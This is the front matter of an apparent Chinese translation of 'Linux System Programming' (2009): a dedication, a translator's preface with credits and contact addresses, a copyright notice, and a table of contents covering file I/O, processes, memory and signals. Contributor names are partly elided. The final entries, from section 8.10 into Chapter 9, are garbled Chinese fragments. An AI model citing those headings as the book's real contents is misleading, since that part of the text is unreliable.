Dedicated to
our brothers who will soon graduate and leave campus — Lin Xiaoxin, Liu Dechao, Huang Wei, Zhou Lanjun, Hu Yuxuan, Wang Xinxi, He Chunxiao, Cui Jian, and Li Hao.
And to
Pan Haidong's soon-to-be-born baby!
Translator's Preface
The translation of Linux System Programming (LSP) was carried out by … at Harbin Institute of Technology and IBM …. The translators include Lin Xiaoxin, Wang …, Cui …, He Chunxiao, Li …, and others. The mailing list [email protected] was used to circulate translation materials, … by Wang …. Liu Wen…, Wang …, Liu Dechao, …, and Wang Xinxi took on the proofreading work. The TeX typesetting work was handled by Li …. Their work moved the LSP translation forward.
… (an engineer at IBM) and … (of SUN) took time out of their busy schedules to proofread the draft and offer corrections and suggestions, and we express our thanks to them. Our thanks also go to the friends of the Harbin Linux User Group.
… If you find any problems with the translation, you can reach us in any of the following ways:
Website: http://www.footoo.org
Twitter: http://twitter.com/cliffwoo
Email: [email protected] or [email protected]
Google Groups: http://groups.google.com/group/lspcn/
Harbin Institute of Technology
April 30, 2009
Copyright Notice
The translation work on Linux System Programming was done by … at Harbin Institute of Technology and IBM. This translation is … for learning and exchange only, and must not be used for commercial purposes.
The rights in Linux System Programming belong to its author and the original publisher; the original author's and publisher's … ….
Table of Contents
Translator's Preface . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . III
Copyright Notice . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . IV
Chapter 1 Introduction and Essential Concepts . . . . . . . . . . . . . . . . . . . . . . 1
1.1 System Programming . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
1.1.1 System Calls . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
1.1.2 Invoking System Calls . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
1.1.3 The C Library . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
1.1.4 The C Compiler . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
1.2 APIs and ABIs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
1.2.1 APIs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
1.2.2 ABIs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
1.3 Standards . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
1.3.1 POSIX and SUS History . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
1.3.2 C Language Standards . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
1.3.3 Linux and the Standards . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
1.3.4 This Book and the Standards . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8
1.4 Concepts of Linux Programming . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8
1.4.1 Files and the Filesystem . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8
1.4.2 Regular Files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9
1.4.3 Directories and Links . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
1.4.4 Hard Links . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11
1.4.5 Symbolic Links . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12
1.4.6 Special Files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12
1.4.7 Filesystems and Namespaces . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
1.4.8 Processes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
1.4.9 Threads . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15
1.4.10 Process Hierarchy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
1.4.11 Users and Groups . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
1.4.12 Permissions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17
1.4.13 Signals . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18
1.4.14 Interprocess Communication . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18
1.4.15 Headers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19
1.4.16 Error Handling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19
1.5 Getting Started with System Programming . . . . . . . . . . . . . . . . . . . . 22
Chapter 2 File I/O . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
2.1 Opening Files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24
2.1.1 The open() System Call . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24
2.1.2 Owners of New Files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26
2.1.3 Permissions of New Files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26
2.1.4 The creat() Function . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 28
2.1.5 Return Values and Error Codes . . . . . . . . . . . . . . . . . . . . . . . . . . 29
2.2 Reading via read() . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 29
2.2.1 Return Values . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30
2.2.2 Reading All the Bytes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31
2.2.3 Nonblocking Reads . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
2.2.4 Other Error Values . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
2.2.5 Size Limits on read() . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
2.3 Writing with write() . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 34
2.3.1 Partial Writes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
2.3.2 Append Mode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36
2.3.3 Nonblocking Writes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36
2.3.4 Other Error Codes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36
2.3.5 Size Limits on write() . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 37
2.3.6 Behavior of write() . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 37
2.4 Synchronized I/O . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 38
2.4.1 fsync() and fdatasync() . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 38
2.4.2 Return Values and Error Codes . . . . . . . . . . . . . . . . . . . . . . . . . . 39
2.4.3 sync() . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 40
2.4.4 The O_SYNC Flag . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41
2.4.5 O_DSYNC and O_RSYNC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41
2.5 Direct I/O . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42
2.6 Closing Files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42
2.6.1 Error Values . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43
2.7 Seeking with lseek() . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 44
2.7.1 Seeking Past the End of a File . . . . . . . . . . . . . . . . . . . . . . . . . . . 45
2.7.2 Error Values . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46
2.7.3 Limitations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46
2.8 Positional Reads and Writes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46
2.8.1 Error Values . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 47
2.9 Truncating Files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 47
2.10 Multiplexed I/O . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 49
2.10.1 select() . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 50
2.10.2 Return Values and Error Codes . . . . . . . . . . . . . . . . . . . . . . . . . 52
2.10.3 poll() . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 57
2.10.4 poll() Versus select() . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 61
2.11 Kernel Internals . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 61
2.11.1 The Virtual Filesystem . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 62
2.11.2 The Page Cache . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 63
2.11.3 Page Writeback . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 64
2.12 Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 65
Chapter 3 Buffered I/O . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 66
3.1 User-Buffered I/O . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 66
3.1.1 Block Size . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 67
3.1.2 Standard I/O . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 68
3.1.3 File Pointers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 68
3.2 Opening Files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 69
3.2.1 Modes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 69
3.2.2 Opening a Stream via File Descriptor . . . . . . . . . . . . . . . . . . . . . 70
3.3 Closing Streams . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 71
3.3.1 Closing All Streams . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 71
3.4 Reading from a Stream . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 71
3.4.1 Reading a Character at a Time . . . . . . . . . . . . . . . . . . . . . . . . . . . 71
3.4.2 Putting the Character Back . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 72
3.4.3 Reading an Entire Line . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 72
3.4.4 Reading Arbitrary Strings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 73
3.4.5 Reading Binary Data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 74
3.5 Writing to a Stream . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 75
3.5.1 Alignment Issues . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 75
3.5.2 Writing a Single Character . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 76
3.5.3 Writing a String of Characters . . . . . . . . . . . . . . . . . . . . . . . . . . . 76
3.5.4 Writing Binary Data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 77
3.5.5 Sample Program Using Buffered I/O . . . . . . . . . . . . . . . . . . . . . . 77
3.6 Seeking a Stream . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 79
3.6.1 Obtaining the Current Stream Position . . . . . . . . . . . . . . . . . . . . 80
3.7 Flushing a Stream . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 81
3.8 Errors and End-of-File . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 82
3.9 Obtaining the File Descriptor Behind a Stream . . . . . . . . . . . . . . . . 83
3.10 Controlling the Buffering . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 83
3.11 Thread Safety . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 85
3.11.1 Manual File Locking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 85
3.11.2 Unlocked Stream Operations . . . . . . . . . . . . . . . . . . . . . . . . . . . . 86
3.12 Critiques of Standard I/O . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 87
3.13 Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 88
Chapter 4 Advanced File I/O . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 89
4.1 Scatter/Gather I/O . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 89
4.1.1 readv() and writev() . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 90
4.2 The Event Poll Interface . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 96
4.2.1 Creating a New Epoll Instance . . . . . . . . . . . . . . . . . . . . . . . . . . . 96
4.2.2 Controlling Epoll . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 97
4.2.3 Waiting for Events with Epoll . . . . . . . . . . . . . . . . . . . . . . . . . . . . 99
4.2.4 Edge-Triggered Versus Level-Triggered Events . . . . . . . . . . . . . . 101
4.3 Mapping Files into Memory . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 101
4.3.1 mmap() . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 102
4.3.2 munmap() . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 106
4.3.3 Memory Mapping Example . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 106
4.3.4 Advantages of mmap() . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 108
4.3.5 Disadvantages of mmap() . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 109
4.3.6 Resizing a Mapping . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 109
4.3.7 Changing the Protection of a Mapping . . . . . . . . . . . . . . . . . . . . 110
4.3.8 Synchronizing a File with a Mapping . . . . . . . . . . . . . . . . . . . . . . 111
4.3.9 Giving Advice on a Mapping . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 112
4.4 Advice for Normal File I/O . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 114
4.4.1 posix_fadvise() . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 114
4.4.2 The readahead() System Call . . . . . . . . . . . . . . . . . . . . . . . . . . . . 116
4.4.3 Advice Is Cheap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 116
4.5 Synchronized (Synchronized), Synchronous (Synchronous), and Asynchronous (Asynchronous) Operations . . . 117
4.5.1 Asynchronous I/O . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 118
4.6 I/O Schedulers and I/O Performance . . . . . . . . . . . . . . . . . . . . . . . . 120
4.6.1 Disk Addressing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 120
4.6.2 The Life of an I/O Scheduler . . . . . . . . . . . . . . . . . . . . . . . . . . . . 121
4.6.3 Helping Out Reads . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 122
4.6.4 Selecting and Configuring Your I/O Scheduler . . . . . . . . . . . . . . 125
4.6.5 Optimizing I/O Performance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 125
4.7 Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 132
Chapter 5 Process Management . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 133
5.1 Process IDs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 133
5.1.1 Process ID Allocation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 134
5.1.2 The Process Hierarchy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 134
5.1.3 pid_t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 135
5.1.4 Obtaining the Process ID and Parent Process ID . . . . . . . . . . . 135
5.2 Running a New Process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 136
5.2.1 The Exec Family of Calls . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 136
5.2.2 The fork() System Call . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 139
5.3 Terminating a Process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 143
5.3.1 Other Ways to Terminate . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 144
5.3.2 atexit() . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 145
5.3.3 on_exit() . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 146
5.3.4 SIGCHLD . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 146
5.4 Waiting for Terminated Child Processes . . . . . . . . . . . . . . . . . . . . . . 147
5.4.1 Waiting for a Specific Process . . . . . . . . . . . . . . . . . . . . . . . . . . . . 150
5.4.2 Even More Ways to Wait for Child Processes . . . . . . . . . . . . . . 152
5.4.3 BSD's wait3() and wait4() . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 153
5.4.4 Launching and Waiting for a New Process . . . . . . . . . . . . . . . . . 155
5.4.5 Zombie Processes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 158
5.5 Users and Groups . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 158
5.5.1 Real, Effective, and Saved User (Group) IDs . . . . . . . . . . . . . . . 159
5.5.2 Changing the Real or Saved User (Group) ID . . . . . . . . . . . . . . 160
5.5.3 Changing the Effective User or Group ID . . . . . . . . . . . . . . . . . . 161
5.5.4 Changing the User and Group IDs, BSD Style . . . . . . . . . . . . . 161
5.5.5 Changing the User and Group IDs, HP-UX Style . . . . . . . . . . . 162
5.5.6 Preferred User/Group ID Manipulations . . . . . . . . . . . . . . . . . . . 163
5.5.7 Support for Saved User IDs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 163
5.5.8 Obtaining the User and Group IDs . . . . . . . . . . . . . . . . . . . . . . . 163
5.6 Sessions and Process Groups . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 164
5.6.1 Session System Calls . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 165
5.6.2 Process Group System Calls . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 167
5.6.3 Obsolete Process Group Functions . . . . . . . . . . . . . . . . . . . . . . . . 168
5.7 Daemons . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 169
5.8 Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 171
Chapter 6 Advanced Process Management . . . . . . . . . . . . . . . . . . . . . . . . 172
6.1 Process Scheduling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 172
6.1.1 The O(1) Process Scheduler . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 173
6.1.2 Timeslices . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 173
6.1.3 I/O-Bound Versus Processor-Bound Processes . . . . . . . . . . . . . . 174
6.1.4 Preemptive Scheduling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 175
6.1.5 Threads . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 175
6.2 Yielding the Processor . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 176
6.2.1 Legitimate Uses . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 176
6.2.2 Changes in How the Processor Is Yielded . . . . . . . . . . . . . . . . . . 177
6.3 Process Priorities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 178
6.3.1 nice() . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 179
6.3.2 getpriority() and setpriority() . . . . . . . . . . . . . . . . . . . . . . . . . . . . 180
6.3.3 I/O Priorities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 181
6.4 Processor Affinity . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 182
6.4.1 sched_getaffinity() and sched_setaffinity() . . . . . . . . . . . . . . . . . 183
6.5 Real-Time Systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 185
6.5.1 Hard Versus Soft Real-Time Systems . . . . . . . . . . . . . . . . . . . . . 186
6.5.2 Latency, Jitter, and Deadlines . . . . . . . . . . . . . . . . . . . . . . . . . . . . 186
6.5.3 Linux's Real-Time Support . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 187
6.5.4 Linux Scheduling Policies and Priorities . . . . . . . . . . . . . . . . . . . 188
6.5.5 Setting Scheduling Parameters . . . . . . . . . . . . . . . . . . . . . . . . . . . 192
6.5.6 sched_rr_get_interval() . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 195
6.5.7 Precautions with Real-Time Processes . . . . . . . . . . . . . . . . . . . . 197
6.5.8 Determinism . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 197
6.6 Resource Limits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 200
6.6.1 The Limits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 201
6.6.2 Setting and Retrieving Limits . . . . . . . . . . . . . . . . . . . . . . . . . . . . 204
Chapter 7 File and Directory Management . . . . . . . . . . . . . . . . . . . . . . . . 207
7.1 Files and Their Metadata . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 207
7.1.1 The Stat Family . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 207
7.1.2 Permissions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 211
7.1.3 Ownership . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 213
7.1.4 Extended Attributes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 215
7.2 Directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 223
7.2.1 Obtaining the Current Working Directory . . . . . . . . . . . . . . . . . 224
7.2.2 Creating Directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 229
7.2.3 Removing Directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 230
7.2.4 Reading a Directory's Contents . . . . . . . . . . . . . . . . . . . . . . . . . . 231
7.3 Links . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 235
7.3.1 Hard Links . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 236
7.3.2 Symbolic Links . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 237
7.3.3 Unlinking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 239
7.4 Copying and Moving Files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 240
7.4.1 Copying . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 240
7.4.2 Moving . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 241
7.5 Device Nodes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 242
7.5.1 Special Device Nodes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 243
7.5.2 The Random Number Generator . . . . . . . . . . . . . . . . . . . . . . . . . 243
7.6 Out-of-Band Communication . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 244
7.7 Monitoring File Events . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 246
7.7.1 Initializing inotify . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 247
7.7.2 Watches . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 247
7.7.3 inotify Events . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 249
7.7.4 Advanced Watch Options . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 252
7.7.5 Removing an inotify Watch . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 253
7.7.6 Obtaining the Size of the Event Queue . . . . . . . . . . . . . . . . . . . . 254
7.7.7 Destroying an inotify Instance . . . . . . . . . . . . . . . . . . . . . . . . . . . 255
Chapter 8 Memory Management . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 256
8.1 The Process Address Space . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 256
8.1.1 Pages and Paging . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 256
8.1.2 Memory Regions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 257
8.2 Allocating Dynamic Memory . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 258
8.2.1 Allocating Arrays . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 260
8.2.2 Resizing Allocations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 262
8.2.3 Freeing Dynamic Memory . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 264
8.2.4 Alignment . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 266
8.3 Managing the Data Segment . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 270
8.4 Anonymous Memory Mappings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 271
8.4.1 Creating Anonymous Memory Mappings . . . . . . . . . . . . . . . . . . 272
8.4.2 Mapping /dev/zero . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 274
8.5 Advanced Memory Allocation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 275
8.5.1 Fine-Tuning with malloc_usable_size() and malloc_trim() . . . 277
8.6 Debugging Memory Allocations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 278
8.6.1 Obtaining Statistics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 278
8.7 Stack-Based Allocations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 280
8.7.1 Duplicating Strings on the Stack . . . . . . . . . . . . . . . . . . . . . . . . . 282
8.7.2 Variable-Length Arrays . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 283
8.8 Choosing a Memory Allocation Mechanism . . . . . . . . . . . . . . . . . . . 284
8.9 Manipulating Memory . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 286
8.9.1 Setting Bytes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 286
8.9.2 Comparing Bytes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 287
8.9.3 Moving Bytes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 288
8.9.4 Searching Bytes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 289
8.9.5 Frobnicating Bytes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 290
8.10内存. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 291
8.10.1 空间 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 291
8.10.2 空间 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 292
8.10.3 内存. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 293
8.10.4 的 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 294
8.10.5 页理内存 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 294
8.11性存 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 295
8.11.1 超内存 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 295
第 9 章 信号 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 297
9.1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 297
